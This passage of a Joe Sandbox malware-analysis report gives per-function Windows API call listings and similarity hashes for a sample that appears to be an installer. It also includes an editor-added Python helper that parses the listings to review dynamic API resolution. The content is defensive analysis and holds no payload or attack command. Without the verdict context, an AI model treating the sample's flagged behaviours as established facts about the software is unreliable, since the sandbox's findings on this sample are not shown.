• GetProcAddress.KERNEL32(00000000), ref: 00CD6434
• __Init_thread_footer.LIBCMT ref: 00CD6448
• GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD667E
• LeaveCriticalSection.KERNEL32(00E9C5D0,?,00000000), ref: 00CD67BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
• String ID: *** Stack Trace (x86) ***$,_$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
• API String ID: 1326996155-1203891687
• Opcode ID: f8dc8248f7df242b1e0cd893e5eaf8fa9a2d26ba989750d6c89d87a2a5669bf4
• Instruction ID: f8550313a08c35e79f09b44c27ad408fa4dec4be8bf2ba4e9d8d7240ee2ea175
• Opcode Fuzzy Hash: f8dc8248f7df242b1e0cd893e5eaf8fa9a2d26ba989750d6c89d87a2a5669bf4
• Instruction Fuzzy Hash: 7DD1DD719006689FDB20DF24CC89BEEBBB4AF44305F1041DAE549B7291DBB56B88CF60
Uniqueness

Uniqueness Score: -1.00%

APIs
• InitializeCriticalSection.KERNEL32(00E994D0,1FC3D414,00000010,?), ref: 00CFF92C
  • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
• EnterCriticalSection.KERNEL32(?,1FC3D414,00000010,?), ref: 00CFF939
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CFF96B
• FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CFF974
• WriteFile.KERNEL32(00000000,00DF1D8D,38E9084D,?,00000000,00E1326C,00000001,?,00000000,?,00000000), ref: 00CFF9F6
• FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CFF9FF
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFA35
• FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFA3E
• WriteFile.KERNEL32(00000000,00CE4613,94D0B9FF,?,00000000,00E15F2C,00000002,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFA9F
• FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFAA8
• LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CFFAD8
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
• GetLocalTime.KERNEL32(?,1FC3D414), ref: 00CFFB6E
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$BuffersFlushWrite$CriticalSection$HeapInit_thread_footer$AllocEnterFindInitializeLeaveLocalProcessResourceTime
                                                                                                                                                                        • String ID: %04d-%02d-%02d %02d-%02d-%02d$,_$l2
                                                                                                                                                                        • API String ID: 4294211394-487377711
                                                                                                                                                                        • Opcode ID: a2456c0fce4f69b0fa692d4c2f78e16977126a5ecfd54fc1a75165eb22e6d629
                                                                                                                                                                        • Instruction ID: 0608aee2caac8f1828983efd5dd90b0664548abbdac43b6a579279d6ad928fb7
                                                                                                                                                                        • Opcode Fuzzy Hash: a2456c0fce4f69b0fa692d4c2f78e16977126a5ecfd54fc1a75165eb22e6d629
                                                                                                                                                                        • Instruction Fuzzy Hash: C9A1CD71900608EFEB00DFA9CD45BBEBBB8FF08310F148169F951A72A1DB759944DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000001F6), ref: 00CD895E
• GetDlgItem.USER32(?,000001F8), ref: 00CD896B
• GetDlgItem.USER32(?,000001F7), ref: 00CD89AD
• SetWindowTextW.USER32(00000000,?), ref: 00CD89BC
• ShowWindow.USER32(?,00000005), ref: 00CD8A22
• GetDlgItem.USER32(?,000001F7), ref: 00CD8A44
• SetWindowTextW.USER32(00000000,?), ref: 00CD8A53
• ShowWindow.USER32(?,00000000), ref: 00CD8AB8
• ShowWindow.USER32(?,00000000), ref: 00CD8ABF
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000616), ref: 00CD8B08
• GetDlgItem.USER32(?,00000000), ref: 00CD8B3A
• IsWindow.USER32(00000000), ref: 00CD8B44
• SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014,?,00000000,?,?,00000616), ref: 00CD8B91
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$Item$Show$Text
• String ID: Details <<$Details >>
• API String ID: 2476474966-3763984547
• Opcode ID: 1db486afc1e9c25b5a9d46073912e8edc39845ac8768b39c0e17ad7e3e133a4d
• Instruction ID: 86f5df2a804dd84e42add0537bfad2db2bebae0ea0bd49baf54cca516ff7a2cd
• Opcode Fuzzy Hash: 1db486afc1e9c25b5a9d46073912e8edc39845ac8768b39c0e17ad7e3e133a4d
• Instruction Fuzzy Hash: 7391A071D10209AFDF149F68DC85BAEBBB5FF48310F10821AF515B7691DB30A999CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,1FC3D414), ref: 00CEA4F9
• IsWow64Process.KERNEL32(00000000), ref: 00CEA500
  • Part of subcall function 00CCC2F0: _wcsrchr.LIBVCRUNTIME ref: 00CCC329
• _wcsrchr.LIBVCRUNTIME ref: 00CEA581
• _wcsrchr.LIBVCRUNTIME ref: 00CEA617
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: _wcsrchr$Process$CurrentWow64
• String ID: "%s" $ /fvomus //$ /i //$ /p //$ EXE_CMD_LINE="%s "$ TRANSFORMS=":%d"$%s AI_SETUPEXEPATH="%s" SETUPEXEDIR="%s"$.x64
• API String ID: 657290924-2074823060
• Opcode ID: 79bbfd5543ee5d998baf6b6356879fc16ef284287b7eb58ff63bd5b0a4a5ead0
• Instruction ID: 27d9ec556b4518750c3d8d60685bfbdbdf1c42cfc00c5d371c8ef4b77af330b7
• Opcode Fuzzy Hash: 79bbfd5543ee5d998baf6b6356879fc16ef284287b7eb58ff63bd5b0a4a5ead0
• Instruction Fuzzy Hash: EEF1D231A016459FDB10DF69CC45BAEB7F4EF45310F18826CE925AB2D2DB74AE04CB91
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00BEB328
• GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00BEB341
• GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 00BEB34D
• GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 00BEB35A
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressProc$HeapInit_thread_footer$AllocLibraryLoadProcess
• String ID: build $20.2$2c3f1cf9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
• API String ID: 1086585969-3504904618
• Opcode ID: 320d1a666acbdf97eaa09afaee3267a1b995532d34d1572a75355b1913f55632
• Instruction ID: b858b07762ec3a02ccc14904fc6736a5b9aa69b553f21917c2ef8381352d0fba
• Opcode Fuzzy Hash: 320d1a666acbdf97eaa09afaee3267a1b995532d34d1572a75355b1913f55632
• Instruction Fuzzy Hash: E2D1AF71D00249AFDB04DFA8CC55BEEBBF4FF44310F148669E911A7291EB74AA44CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,1FC3D414,00E2ADDC,?,?,?,?,?,?,?,?,?,?,?,1FC3D414), ref: 00BBEEFB
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBEF01
• LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,00E1329C,00000000,00000000,00000000), ref: 00BBF08B
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryLoad$AddressProc
• String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
• API String ID: 1469910268-2454113998
• Opcode ID: 70fa8b0be005801558a4f735932656c224bd370188598923784daf24bc3f29f2
• Instruction ID: a7f32587655879950c159333134900fe5495d5a47fca9b051ea7f98e7bc5fffe
• Opcode Fuzzy Hash: 70fa8b0be005801558a4f735932656c224bd370188598923784daf24bc3f29f2
• Instruction Fuzzy Hash: 8EB13B7190020AEFDB14DFA8C895BFDB7F5EF48300F144569E415A72A1EBB49A45CB60
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BBE62E
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBE634
• LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BBE667
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBE66D
• LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E1329C,00000000,00000000,00000000), ref: 00BBE78D
• GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BBE7D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
• API String ID: 2574300362-2454113998
• Opcode ID: 25b7cdd7d475555d5f17264fb943f2c524383b06de93256b442ae4ff090e7fff
• Instruction ID: 971ab6aac565e7ec505edfa9660043e9b884b75bd3bfff64302beab00b0d6013
• Opcode Fuzzy Hash: 25b7cdd7d475555d5f17264fb943f2c524383b06de93256b442ae4ff090e7fff
• Instruction Fuzzy Hash: 98915B71D10209DFDB14DFA8C895BFDB7F1EF58300F2481A9E521A72A0EBB49A45CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CF65B0: GetSystemDefaultLangID.KERNEL32(1FC3D414,0000004C,?,00000048,?), ref: 00CF65E6
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00CDB1E3
• GetProcAddress.KERNEL32(00000000), ref: 00CDB1EA
• __Init_thread_footer.LIBCMT ref: 00CDB201
• GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00CDB220
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressCurrentDefaultHandleInit_thread_footerLangModuleProcProcessSystem
• String ID: IsWow64Process2$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
• API String ID: 52476621-4272450043
• Opcode ID: fd72aa3c5830d9100aee2231b5df39a64314334336ebdc147dd979e2b11f9a47
• Instruction ID: 1942dba1fab0fa3b42c54d3228b055503415cfd0358c5ef731526b8b44ded87f
• Opcode Fuzzy Hash: fd72aa3c5830d9100aee2231b5df39a64314334336ebdc147dd979e2b11f9a47
• Instruction Fuzzy Hash: 12F1AC70900604DFDB14DFA9C994BAEB7F1BF44310F15825EE626AB391EB31AD46CB50
Uniqueness
Uniqueness Score: -1.00%
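The two listings above, for the function at 00BBE62E (LoadLibraryW on combase.dll followed by GetProcAddress, three times) and for the function at 00CDB1E3 (GetModuleHandleW on kernel32 followed by GetProcAddress), are the raw evidence behind the report's "Contains functionality to dynamically determine API calls" signature. Note how the argument columns are best-effort reads of the stack: the export actually being resolved shows up in the loader call's trailing slots (RoGetActivationFactory, CoIncrementMTAUsage, IsWow64Process2) while GetProcAddress itself is shown with 00000000 and a nearby string. The Python helper below is an added example written by this editor, not part of the Joe Sandbox report or its tooling. It parses listing lines in this format, pairs each loader call with the next GetProcAddress in call order, and collects the identifier-looking tokens around the pair as candidate export names. The two sample blocks are copied from the listings above; the NOTES table is the editor's own assumption about what these particular imports usually indicate.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings (added example).

Extracts LoadLibrary*/GetModuleHandle* -> GetProcAddress pairs so the
"dynamically determine API calls" signature can be reviewed by hand.
"""
import re
from dataclasses import dataclass

# Constructed input: the two function blocks copied from the report.
SAMPLE_BLOCKS = {
    "combase": """\
• LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 00BBE62E
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBE634
• LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 00BBE667
• GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00BBE66D
• LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,00E1329C,00000000,00000000,00000000), ref: 00BBE78D
• GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 00BBE7D6
""",
    "wow64": """\
  • Part of subcall function 00CF65B0: GetSystemDefaultLangID.KERNEL32(1FC3D414,0000004C,?,00000048,?), ref: 00CF65E6
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00CDB1E3
• GetProcAddress.KERNEL32(00000000), ref: 00CDB1EA
• __Init_thread_footer.LIBCMT ref: 00CDB201
• GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00CDB220
""",
}

# One listing line: optional "Part of subcall" prefix, Api.Module(args), ref: addr
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
LOADERS = {"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA",
           "GetModuleHandleW", "GetModuleHandleA"}
# Analyst annotations (assumption: what these imports typically mean in a sample).
NOTES = {
    "IsWow64Process2": "OS/WoW64 probing; export exists only on Windows 10 1511+",
    "RoGetActivationFactory": "WinRT activation via combase.dll",
    "CoIncrementMTAUsage": "COM/WinRT MTA bootstrap via combase.dll",
    "DllGetActivationFactory": "WinRT activation export of a loaded DLL",
}


@dataclass
class Call:
    api: str
    args: list
    ref: str


@dataclass
class Resolution:
    module: str    # first loader argument, or "<unknown>" when the slot is "?"
    symbols: list  # identifier-looking tokens seen around the pair
    refs: tuple    # (loader ref, GetProcAddress ref)


def parse_calls(block: str) -> list:
    """Turn listing lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in block.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a for a in (m["args"] or "").split(",") if a]
        calls.append(Call(m["api"], args, m["ref"]))
    return calls


def _is_symbol(tok: str) -> bool:
    # Argument slots mix pointers, "?" placeholders and nearby strings; keep
    # identifier-looking tokens and drop 8-digit hex values and module names.
    return bool(re.fullmatch(r"[A-Za-z_]\w+", tok)) and not re.fullmatch(r"[0-9A-F]{8}", tok)


def find_resolutions(calls: list) -> list:
    """Pair every loader call with the next GetProcAddress in call order."""
    out, pending = [], None
    for c in calls:
        if c.api in LOADERS:
            pending = c
        elif c.api == "GetProcAddress" and pending is not None:
            module = pending.args[0] if pending.args and pending.args[0] != "?" else "<unknown>"
            toks = pending.args[1:] + c.args[1:]
            symbols = sorted({t for t in toks if _is_symbol(t) and t != module})
            out.append(Resolution(module, symbols, (pending.ref, c.ref)))
            pending = None
    return out


def triage(block: str) -> list:
    """One annotated line per resolved-import pair, e.g. for a triage report."""
    lines = []
    for r in find_resolutions(parse_calls(block)):
        note = "; ".join(NOTES[s] for s in r.symbols if s in NOTES) or "no annotation"
        lines.append(f"{r.refs[0]}->{r.refs[1]} {r.module}: {','.join(r.symbols) or '?'} [{note}]")
    return lines


if __name__ == "__main__":
    for name, blk in SAMPLE_BLOCKS.items():
        print(name)
        for line in triage(blk):
            print("  " + line)
```

Run against the copied blocks it reports three combase.dll resolutions (the third with an unknown module, since that LoadLibraryW slot is "?") and one kernel32 resolution of IsWow64Process2. Pairing is positional, so a block that interleaves unrelated calls between a loader and its GetProcAddress still pairs correctly, but a loader with no following GetProcAddress in the same block is simply dropped; check the subcall lines by hand in that case.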

APIs
• CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,1FC3D414), ref: 00BE5288
  • Part of subcall function 00BC72B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00BC72E6
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00BE538B
• SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00BE539F
• SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00BE53B4
• SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00BE53C9
• SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00BE53E0
• GetWindowRect.USER32(?,?), ref: 00BE5412
• SendMessageW.USER32(00000000,00000412,00000000), ref: 00BE5474
• SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00BE5484
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend$Window$CreateLongRect
• String ID: ,$tooltips_class32
• API String ID: 1954517558-3856767331
• Opcode ID: cf5683b464f5279adeb92e57f8d901dcf0691d9855117fb741c80e3741697a77
• Instruction ID: 2ea79b1e054aaff164ccdd62e91196b134467343c4462d698ca28135992447a6
• Opcode Fuzzy Hash: cf5683b464f5279adeb92e57f8d901dcf0691d9855117fb741c80e3741697a77
• Instruction Fuzzy Hash: 94913071A00348AFDB14CFA5CC95FAEBBF9FB08700F10852AF556EA691D774A908CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CCFF30: LoadLibraryW.KERNEL32(ComCtl32.dll,1FC3D414,?,00000000,00000000), ref: 00CCFF6E
  • Part of subcall function 00CCFF30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCFF91
  • Part of subcall function 00CCFF30: FreeLibrary.KERNEL32(00000000), ref: 00CD000F
• GetDlgItem.USER32(?,000001F4), ref: 00CD8641
• SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 00CD8652
• MulDiv.KERNEL32(00000009,00000000), ref: 00CD866A
• GetDlgItem.USER32(?,000001F6), ref: 00CD86A4
• IsWindow.USER32(00000000), ref: 00CD86AD
• SendMessageW.USER32(00000000,00000030,?,00000000), ref: 00CD86C4
• GetDlgItem.USER32(?,000001F8), ref: 00CD86CE
• GetWindowRect.USER32(?,?), ref: 00CD86DF
• GetWindowRect.USER32(?,?), ref: 00CD86F2
• GetWindowRect.USER32(00000000,?), ref: 00CD8702
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Window$ItemRect$LibraryMessageSend$AddressFreeLoadProc
• String ID: Courier New
• API String ID: 1717253393-2572734833
• Opcode ID: 7340a6beba2642485f6081aa4b9e397415553acfe789a32568e07eb011dd1b20
• Instruction ID: 75db46828dccbe1da40d3d226aaf44d1beb4de2fb02bebf5b6eea380a3b7501a
• Opcode Fuzzy Hash: 7340a6beba2642485f6081aa4b9e397415553acfe789a32568e07eb011dd1b20
• Instruction Fuzzy Hash: BF41D771B843087FEB149F258C42FAE7799EF48B04F01061EFB497A2D1DAB0A8448B59
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(00000000,000000F0), ref: 00C299B7
• GetParent.USER32 ref: 00C299CD
• GetWindowRect.USER32(00000000,?), ref: 00C299D8
• GetParent.USER32(00000000), ref: 00C299E0
• GetWindow.USER32(?,00000004), ref: 00C29A12
• GetWindowRect.USER32(00000000,?), ref: 00C29A20
• GetWindowLongW.USER32(00000000,000000F0), ref: 00C29A2D
• MonitorFromWindow.USER32(00000000,00000002), ref: 00C29A45
• GetMonitorInfoW.USER32(00000000,00000000), ref: 00C29A5F
• SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000004), ref: 00C29B0D
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$LongMonitorParentRect$FromInfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1820395375-0
                                                                                                                                                                        • Opcode ID: 3595af7428c166f5bbae25040bc968d21d01847afaa3a020c718aa5d34c35027
